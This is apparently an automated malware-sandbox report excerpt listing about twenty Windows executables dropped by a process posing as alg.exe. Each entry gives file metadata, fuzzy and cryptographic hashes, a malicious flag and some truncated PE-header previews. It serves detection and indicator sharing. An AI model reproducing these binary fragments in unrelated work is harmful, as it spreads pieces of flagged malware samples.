                                                                                                                                                SSDEEP:24576:HBpDRmi78gkPXlyo0GtjrhsqjnhMgeiCl7G0nehbGZpbD:hNRmi78gkPX4o0GtjJDmg27RnWGj
                                                                                                                                                MD5:5A66AEAE16261BFA42AE2B9561477C6B
                                                                                                                                                SHA1:F48CABBEA97B0FFC77ACBC79EBEF8CFAE838BB74
                                                                                                                                                SHA-256:96120DC12D026435B346A7606760942C74CDCB6EBD71A312E7CEA2EFAFA09E64
                                                                                                                                                SHA-512:DDC195D2FF8A518B0F8350F4E63B5678810E0B70BAB66F4230BCE0193A311690F6516FDB2C9CDBA593616847638CDFC21C5AD83346FFF8E861B6569A9AD56AD6
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..2..2..2.0.\..2..I..2..3..2..O..2..\.D.2...6..2.._..2..N..2..J..2.Rich.2.........................PE..d....\.d.........."......b...8......Pi........@.....................................Pg.... .................................................P................... .......................................................................(.......@....................text....a.......b.................. ..`.rdata...i.......j...f..............@..@.data...............................@....pdata.. ...........................@..@.rsrc...............................@..@.reloc...............r..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1282048
                                                                                                                                                Entropy (8bit):7.229073239478126
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:ALOS2oTPIXVasqjnhMgeiCl7G0nehbGZpbD:4/TRDmg27RnWGj
                                                                                                                                                MD5:C38EC146DA961FF715CB73A86C0391FB
                                                                                                                                                SHA1:A74F549E65C108CEDEF75B6696E4FA314D0C0498
                                                                                                                                                SHA-256:68898E63255833CA872EC15EC9F67B675256C5AC2BC736AC3DF9BAE5A2DFBFE1
                                                                                                                                                SHA-512:95C0CA7F69567227F1C37C00DE3A5ED299F8E025E24B3B06FCC63A104406C85007C3A3071C8B40A494F88788DAF188B974A1D88BC5AD3E2D3960CE5C6D729164
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.VS.y8..y8..y8...C.jy8..y9..y8...E.}y8...V..y8.i.<.~y8...U.ky8...;.~y8...D.~y8...@.~y8.Rich.y8.........PE..d....\.d.........."......&..........."........@......................................?.... ..............................................................d...........................................................................@...............................text...4$.......&.................. ..`.rdata..Ts...@...t...*..............@..@.data...83..........................@....pdata..............................@..@.rsrc....d.......f...:..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1145344
                                                                                                                                                Entropy (8bit):5.031200705264902
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:N1cXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:N1csqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:62A2A7290CA1CA7C89C99A694E3AB88F
                                                                                                                                                SHA1:82DD48E0F4D7A18922B968BEAE172C5681632958
                                                                                                                                                SHA-256:D73AB7C734F2B2A149DC9B13DC451A9BA93328D0FF3814A9CC58B50F2DB25506
                                                                                                                                                SHA-512:18A7105BC4CA6218AFFD56C5809467FAD2ABC366B65182005630136B312F62CEBE96D1D333FECE2DE4178C47CE9EF6A0899B447DCC9ACC8B2A6EE333AFEE3446
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../..........@......f!.......0....@................................./W......................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc....`...`...P...*..............@...........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1222656
                                                                                                                                                Entropy (8bit):6.712044262854111
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:mRudzTXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:mAdzTsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:23089211B2DB8F85466382B869EE6DC5
                                                                                                                                                SHA1:2B41E7841EB262FC349845521793D97499FD1C0C
                                                                                                                                                SHA-256:D56A15002F892A14F8824827984FE86BD8091F38194A7325ED2E272E2D0C42AC
                                                                                                                                                SHA-512:E7B20D768170DF53B57C39169381332F9561A1D732318CDDEC24B8C2BC95EB1C764341C6B286617EB5CAE09A8CC04B9B631F236BDD3A540D6253133FFE7BDC9E
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4.F.4.F.4.F.LEF.4.FE@.G.4.FE@.G.4.FE@.G.4.FE@.G.4.F._.G.4.F.4.F%4.FG@.G.4.FG@)F.4.F.4AF.4.FG@.G.4.FRich.4.F................PE..d......d.........."......6.....................@....................................u..... .....................................................|....P..h........9.....................p.......................(...P...8............P...............................text....4.......6.................. ..`.rdata..>....P.......:..............@..@.data...............................@....pdata...9.......:..................@..@.rsrc...h....P......................@..@.reloc..............................@...................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1457664
                                                                                                                                                Entropy (8bit):5.082163862101876
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:Dv/Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:DsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:88CDCED6D38CD8585D1C5ACDA4C758B7
                                                                                                                                                SHA1:84B560D77D31D0E234B549214994A614AAC6A61C
                                                                                                                                                SHA-256:D0A0AB744724B6CBAFEFB5315589AAEFA882B7EB829863B96C91E8A495E2417F
                                                                                                                                                SHA-512:695D2B3A56C50F0EDC09438502D03EA084013491D88E42D2FFE6AA745E92CD61FCFCBDFB39D350D6EA9C72A3B840426BA00AF1F20D0E7B37E1D34E3C80D6EF26
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......]../...|...|...|B..}...|B..}...|...}...|..S|...|..}=..|..}...|..}...|..}...|..=|...|o..|...|B..}...|...|...|..}...|..Q|...|..9|...|..}...|Rich...|................PE..d......d.........."......H...........&.........@....................................J..... .................................................@...,....@..........4......................T.......................(...@...8............`...............................text....G.......H.................. ..`.rdata.......`.......L..............@..@.data...............................@....pdata..4...........................@..@.CRT....@....0......................@..@.rsrc........@......................@..@.reloc...P...P...@..................@...................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1461248
                                                                                                                                                Entropy (8bit):5.4686364567503
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:f5zhM1XSEesqjnhMgeiCl7G0nehbGZpbD:jMsXDmg27RnWGj
                                                                                                                                                MD5:F9B30B22B474309411F2E8F9F52E13B3
                                                                                                                                                SHA1:E67EB8CE178589CB70BA7D3CD2D7564292273991
                                                                                                                                                SHA-256:2D8DF72F92CE497534DDFFFF1FA9930184EFBF76A5371A25AA75DC15BE7889FF
                                                                                                                                                SHA-512:A330968243A4BFD25C2D58FB344176B8D4E99D6B2CEDE2A975441FF34485B5687EA9CC7ECC6848C98C621C370B3BC3986C15450002E98C9BD71D48150856EEBA
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........<$.Rw.Rw.Rw...w..Rw5.Vv.Rw5.Qv.Rw5.Sv.Rw7.Sv.Rw..Vv.Rw..Tv.Rw..Sv..Rw.Sw..Rw5.Wv.Rw.t/w.Rw.t?w..Rw7.Wv.Rw7.Vv.Rw7.w.Rw..w.Rw7.Pv.RwRich.Rw........PE..d......d.........."..........z......@..........@....................................D..... ................................................. A...................+......................T.......................(.......8............................................text............................... ..`.rdata..............................@..@.data....d...`...\...T..............@....pdata...+.......,..................@..@.rsrc............0..................@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4151808
                                                                                                                                                Entropy (8bit):6.4997943136623215
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:XtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755NDmg27RN:XjEIa4HIEWOc57D527BWG
                                                                                                                                                MD5:E891045D3D92756AFF06E5AD88A9A96E
                                                                                                                                                SHA1:643DDAF1B1FD7A6564D9A17403E96F9F885BC82F
                                                                                                                                                SHA-256:19B15EF68BE5348CA3791572FD8C7299B35B7CF12C8E342EA2F4A8A5441E68F3
                                                                                                                                                SHA-512:88378524FB5623A59A998623FEC421890C843FCAF5262E572B01FC790773DF26AC9E664239C0CC59F9F6F4BEB91DF5CB2EC5748EFA2756209167266630F3C092
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.......?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):59941376
                                                                                                                                                Entropy (8bit):7.999367322916156
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:1572864:bQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:MXhwMhe6AABPiQwF6xQ22R
                                                                                                                                                MD5:E8C220FD138AB24B5A82FBB027058C25
                                                                                                                                                SHA1:831D349A6B09B53AFF1E97468AC6679ECEAEB85A
                                                                                                                                                SHA-256:218565C43A3827BA755806950EB4C02C745EE58735BE0171EBD2215F77D18D4C
                                                                                                                                                SHA-512:4F352F4341928E4556AEEE2672FEDEB50BB938FE19B2C994661C28465DD6EAC1A4C3A87DE61049E9882E47D23963E96A0CA6C203342D79D79BC6C29FCEF6F3D4
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0......r..... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1180160
                                                                                                                                                Entropy (8bit):5.084815582388739
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:JWPXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:JusqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:07306FA985CE9B63E5C3B77BAB0B9922
                                                                                                                                                SHA1:CB422C76989178BE8F6AA12A84D5F828E824CE1F
                                                                                                                                                SHA-256:7C9C4341F8D93F5F31ACD3A1A59254862CE8A5071D0D99A46732DD815F6E29E2
                                                                                                                                                SHA-512:D499E433FC1ADD0386BDF8C84AF56BEEF11D4ECBA79F228D8CED38606492DB43F1D8A1DF5423344D75AAA6B79B1046D40CC582ED7D9C066E2F98730BBAA9FD6D
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e....b..b..b.|...b.epf..b.epa..b.epg..b.epc..b.oc..b..c.2.b.gpg..b.gp...b.....b.gp`..b.Rich..b.................PE..d...R..d.........."......l...Z.......m.........@.............................@....... .... .....................................................|.......p.......@.......................T.......................(.......8............................................text...>k.......l.................. ..`.rdata..J:.......<...p..............@..@.data...............................@....pdata..@...........................@..@.rsrc...p...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):6210048
                                                                                                                                                Entropy (8bit):6.3867081744638465
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:5DvZEaFVUn+Dpasot2xQevgjCGT7lmPIionqOgBhGl6zVLkVEk3yV07U24GEQTXZ:6nN9KfxLk6GEQTX5UKzNDQD527BWG
                                                                                                                                                MD5:05C27F75FEED45A4B778C8AFE1E246D9
                                                                                                                                                SHA1:32AD640D4B16111DF74CE6E086D3301FFF17FE30
                                                                                                                                                SHA-256:76B61D2C7674B8C4AA48362E7F3D1DF69BDFE6A91471D97AC45FC9B338311B40
                                                                                                                                                SHA-512:7DC2341D72F91CE9C862AFA45D19D5180E5D4836CD90A4F873B8D2BEF7EF00300EA0C7C98CC41E7BC5D94E3AEA96F949653697CA795EC00C61AFCFC225648AA6
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......;..j...9...9...9k..8r..9k..8...9...8l..9...8t..9..p9|..9...9...9...8...9k..8\..9k..8}..9k..8n..9...9...9...8Y..9...8~..9..r9~..9...9|..9...8~..9Rich...9........................PE..d......d.........."......V4..,"......L(........@.............................._......k_... ..........................................<F.|....EF.x....0K..V...@H......................n;.T....................o;.(....:.8............p4..... .F.`....................text...,T4......V4................. ..`.rdata..@....p4......Z4.............@..@.data...l.....F......nF.............@....pdata.......@H......vG.............@..@.didat.. .....K......>J.............@..._RDATA....... K......HJ.............@..@.rsrc....V...0K..X...JJ.............@..@.reloc...0....V.. ....U.............@...................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1157120
                                                                                                                                                Entropy (8bit):5.041495516294096
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:4GXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:4GsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:B96557E0B6A5A46C8D4589BD2115FEFB
                                                                                                                                                SHA1:955F64B0742478DE405F9ED49F34704DAA48E1F0
                                                                                                                                                SHA-256:367D6D13EC0C96F041AB470D69D8A10B6FA8E50A26B20BF32C13AB460CE55301
                                                                                                                                                SHA-512:58022D07037E375BE173DD6618292444F4854C8D61E8816202A94E611219803F2A7437CADF0819AE53FE1B80B0670F5571FF7E3ECF2656A3E960F11F4DABD5AE
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.tKx...x...x...q..t.......c.......r.......{.......~...l...}...x...........|.......y...x...y.......y...Richx...................PE..d......d.........."..........>.......0.........@....................................ma.... .................................................lV..........h...........................PI..T....................K..(....I..8............@...............................text....,.......................... ..`.rdata..4"...@...$...2..............@..@.data........p.......V..............@....pdata...............X..............@..@.rsrc...h............\..............@..@.reloc...P.......@...h..............@...................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):12039168
                                                                                                                                                Entropy (8bit):6.5966829097720066
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:98304:8b+MzPstUEHInwZk3RBk9DdhgJCudq1uVIyESYgKdD527BWG:unPgTHIwZoRBk9DdhSUEVIXgKdVQBWG
                                                                                                                                                MD5:C1161B318444867CB90F7E6776CD255B
                                                                                                                                                SHA1:48F16D289C6E9C83B41CBCBA0E114146FA5CCB96
                                                                                                                                                SHA-256:38267E82FBD7C95C0382876708CA726B9B927FBBF2870818A7706CDFCC9C79B8
                                                                                                                                                SHA-512:F5E50495699753464DE81CA1F5178AC29399105E2090B461BB695EFAFFFBC4FA136E6D3B2DB97952FA4EF0460C096C246586D5579F37733BA85D12B2B285124D
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......&.w.bb..bb..bb..v...lb..v...b.....qb.....hb......ab......b..E.t.Vb..E.d.jb.....ib......b..v...|b..v...cb.....`..bb..}b..v...Ab..bb..,`.....b.....cb.....cb..bb..`b.....cb..Richbb..........PE..d......d..........".........../.....0.F........@.....................................?.... ............................................\...,..h........G......Lz..................P..T......................(......8...........................................text............................... ..`.rdata..f. .......!.................@..@.data..............................@....pdata..Lz.......|.................@..@.didat...............X..............@..._RDATA...............Z..............@..@.rsrc....G.......H...\..............@..@.reloc... .........................@...........................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1322496
                                                                                                                                                Entropy (8bit):5.281824437110067
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:kg5FvCPusJsqjnhMgeiCl7G0nehbGZpbD:BfteDmg27RnWGj
                                                                                                                                                MD5:C9EF0930668C961757F81EB03BE5DC43
                                                                                                                                                SHA1:0EC89BFFFA6AED2C155EBB9FAF97DA9A3981C3C4
                                                                                                                                                SHA-256:0BD8B9FA5C841EF0331EFC882EEC0300C6FC23E1C4DE974F53570CC594887217
                                                                                                                                                SHA-512:22B9ECAC3A59EADA1D4893E56E75B70DB961319535E355E1EFE7B180C78FF24519035B1D12F3D322EB1DC79CB5AB0D8C116B4BF8BE814B0D243C91BF1758821B
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ z.A...A...A...9...A..O5...A..O5...A..O5...A..O5...A...*...A...A...@..M5...A..M5.A...A...A..M5...A..Rich.A..................PE..d......d.........."..........b.................@.............................p............ .................................................X...h....p..p....P..t.......................T.......................(.......8............................................text...,........................... ..`.rdata.............................@..@.data........@.......&..............@....pdata..t....P......................@..@.rsrc...p....p.......B..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1339904
                                                                                                                                                Entropy (8bit):7.208931448407581
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:sjKTIsAjFuvtIfmFthMaT5U8aChaeu7sqjnhMgeiCl7G0nehbGZpbD:sjIMmPh7TT79WDmg27RnWGj
                                                                                                                                                MD5:CE5A626CF331EC3C2C3A82E1C77CB06B
                                                                                                                                                SHA1:299005557C5999DC8DBCAD35784238BA9E19398A
                                                                                                                                                SHA-256:3A6F5C6EA638655F4C15B52A039071E444E7C460D926DB5ED0F85644767A45C4
                                                                                                                                                SHA-512:51FACF09CA6BD6AE092AA99C688A77E62FF4D7718113139798330EED5007DBC4AEF840ED9487FE630B078AAA537E200FC0CE97AFAB36292037E249DEA3965C81
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......................................s...X............................[....U=....................h...n......n.Y.....1....n......Rich...........PE..d......c..........".................0i.........@..............................$......C.... .................................................H...d............@..Tx......................p...................`...(...`................................................text............................... ..`.rdata..@...........................@..@.data....>......."..................@....pdata..Tx...@...z..................@..@.rsrc................z..............@..@.reloc..............................@...................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1515520
                                                                                                                                                Entropy (8bit):5.411788052860841
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:YGqVwCto1Gm5WgfsqjnhMgeiCl7G0nehbGZpbD:lZ1GmUgDmg27RnWGj
                                                                                                                                                MD5:DB0F5E102662CEF84DC65317DC6351D2
                                                                                                                                                SHA1:B7A45F7821F1EC4AFB93CF3EDABD48A4AD68B5BC
                                                                                                                                                SHA-256:26A9AA476707B41B7B66E1DF71B2BC23552457E0DA4245E518A7E00789910E1A
                                                                                                                                                SHA-512:D5B9FED88314A54D4D0A7FC0A4A981847A87C32A73B39B6BD47F432B48687B8E662819EA7246241FDB681525C1A9A984A8A660AE09D04B23603A4E034B32CD9B
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................v......................................a..X.....X........r....X.....Rich...........PE..d......c.........."............................@.......................................... .................................................. ...........v..............................p.......................(....................0...............................text............................... ..`.rdata..Z$...0...&..................@..@.data...x"...`.......@..............@....pdata...............L..............@..@.rsrc....v.......v...j..............@..@.reloc...P...0...@..................@...................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1253376
                                                                                                                                                Entropy (8bit):5.157419599560754
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:UWBWbXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:UWBWbsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:699B88AF04FB4B617482584C8CD550B0
                                                                                                                                                SHA1:D5EB9F8D6F083488B3BBB654228FFA90BF449307
                                                                                                                                                SHA-256:995AA05AD8373DA7B8545B66181FC7481D972E78240C1DFAD7E793F4F9B06556
                                                                                                                                                SHA-512:49E13187034BAA713655E43BC701A070E11FD4E9A5B69BE6842F7E7A1F0B2809B824BF0E59FB6DEFD6AD9542F07303E4C51646ACBCDC3D652045E09DEBFCEE0E
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1683968
                                                                                                                                                Entropy (8bit):7.228507439408022
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:pf9AiKGpEoQpkN2C4McuKo0GTNtpyT5RGeQa0QsqjnhMgeiCl7G0nehbGZpbD:p+GtCi27mVTyT+a0MDmg27RnWGj
                                                                                                                                                MD5:411183BDDE745A5649A7E9B7CF2AC51F
                                                                                                                                                SHA1:D8B9B4F960F6686C127DF1BD3330BB65220A1926
                                                                                                                                                SHA-256:E07E59F649A13392CE890990C4CF85E431853CF95FBBB9593D86E51CD8171932
                                                                                                                                                SHA-512:95E0C0EDB9BEEF1B57DFCEE84C6557E0A32C9B0BD87088F7FACD7C838DFA0AE83FB825BD4AC33B5CA41AB158BF1391E623A90AC845AD391FD88D510F6214450B
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3110912
                                                                                                                                                Entropy (8bit):6.649677204951066
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:3U198PzqkltcT0gViJNfBZQiOIK5Ns6YZ82PTJeYbDmg27RnWGj:o2NfHOIK5Ns6qR9BD527BWG
                                                                                                                                                MD5:2AE3E9A2E2341049034C18F64E2945E9
                                                                                                                                                SHA1:EDFB379DE972F733ACF52886379D1921FF85EB5A
                                                                                                                                                SHA-256:1A4A8E1644625C62289E671BF35ED260425462D2E4F6BB8281A7D1338AFAB4D0
                                                                                                                                                SHA-512:207B49B4E00CA340B771B07A49A1F56ABEF00D0E1DF936C4C7921846FC53702A4FB0E4CA76915AEE0BED779B2FE0516998A2BC51CE6750D779824093E589C56C
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1588224
                                                                                                                                                Entropy (8bit):5.5319372055364875
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:AkcWTUQcydvsqjnhMgeiCl7G0nehbGZpbD:AhKUUDmg27RnWGj
                                                                                                                                                MD5:6FBF39ADD7D89602D8DC7EA3216A4AB7
                                                                                                                                                SHA1:E84D546A8562AEA65F8F83DC60B990114FFEAA90
                                                                                                                                                SHA-256:D48129B9F9C3DDEE070CBB6B76340248BD2711E71470FE7553D8622CD374639C
                                                                                                                                                SHA-512:C7EC00244B25EA2B7EEDE55FDD0962BED5E8853EA7EA48C71FDA0D8F66FAA066DA2593122BB925CEEB1BB2D4AD4B36C6C03FA7FA2C14DA94CDD0B652901FD069
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1338368
                                                                                                                                                Entropy (8bit):5.352668264994154
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:pfY+FUBAXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:pA+qBAsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:EBA9125D47E7573A85ED726DA86E5C6D
                                                                                                                                                SHA1:B855CD2C298050719A7C6F6B50E50A9F0AD5C6D1
                                                                                                                                                SHA-256:BCA2935050FBE36B421B3B027839A4F5F740BBC5A80F43571835268137B0DFA1
                                                                                                                                                SHA-512:E89AD785D4677FA8EADE717EB06B71116BA5134838AEDAB9D2916C088E77BA4144B1C7542AA34874007D3A164CCDB0CCF51CB15220104146BADD46505A17ABB8
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1143296
                                                                                                                                                Entropy (8bit):5.022680124667772
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:xXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:xsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:BC84410921BCD1003FC2CF0BAA6975E5
                                                                                                                                                SHA1:FCFC1A007D2543C4DF3C411D8A004F9108A1BF45
                                                                                                                                                SHA-256:211738C59AE2DFF85BC28DB2B04FBE659812A493B2C8B3D40914507D27DD47E8
                                                                                                                                                SHA-512:80513DBAFE4780175984A98A737C3F872DA3FF545EEB07BC27E41946255E67A4918C750B1FE03DFD001488EA964CA5C090FB0A4A8C219683CDC4DD3A517E3C9A
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1161728
                                                                                                                                                Entropy (8bit):5.047168805090366
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:G0Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:jsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:649623194B464323911FFC4ADD7C5469
                                                                                                                                                SHA1:BBB2646D3BDB331F653A7C92CED0E82F2CA727C1
